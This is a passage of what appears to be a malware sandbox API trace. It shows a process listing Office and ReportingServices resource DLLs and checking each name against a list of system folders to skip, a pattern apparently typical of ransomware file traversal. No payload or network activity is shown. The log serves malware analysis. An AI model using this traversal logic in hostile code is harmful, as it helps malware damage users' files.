(lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.863] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.864] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff580e7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.864] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d698, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.865] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86cced8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.865] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.865] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.865] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d578, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0126.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.866] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2984c3b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2984c3b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f7aa31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5488, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.866] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d728, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.867] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.867] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d698, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d728, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.868] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a088, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.868] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, 